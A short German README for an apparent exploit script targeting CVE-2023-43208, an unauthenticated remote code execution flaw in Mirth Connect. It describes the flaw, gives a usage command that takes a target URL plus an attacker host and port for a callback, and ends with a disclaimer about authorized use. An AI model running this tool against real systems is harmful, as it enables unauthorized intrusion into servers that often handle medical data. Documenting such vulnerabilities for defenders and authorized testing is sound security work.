
Python-Implementierung von CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
Dieser Exploit nutzt eine kritische Deserialisierungsschwachstelle in der XStream-Engine von Mirth Connect aus. Sie resultiert aus einem unvollständigen Patch für CVE-2023-37679 und ermöglicht nicht authentifizierte beliebige Codeausführung in allen Versionen vor 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Dieses Exploit-Skript dient ausschließlich Bildungszwecken und autorisierten Sicherheitsaudits, um Verteidiger bei der Eindämmung von CVE-2023-43208 zu unterstützen; jede Verwendung dieses Tools gegen nicht autorisierte Ziele ist illegal und liegt in der alleinigen Verantwortung des Endbenutzers. Der Autor stellt diese Software "wie besehen" ohne jegliche Gewährleistung bereit, lehnt jede Haftung für möglichen Missbrauch oder Schäden ab und befürwortet oder ermutigt nicht zu nicht autorisierten Aktivitäten. Nutzung auf eigenes Risiko und nur in Übereinstimmung mit geltenden Gesetzen.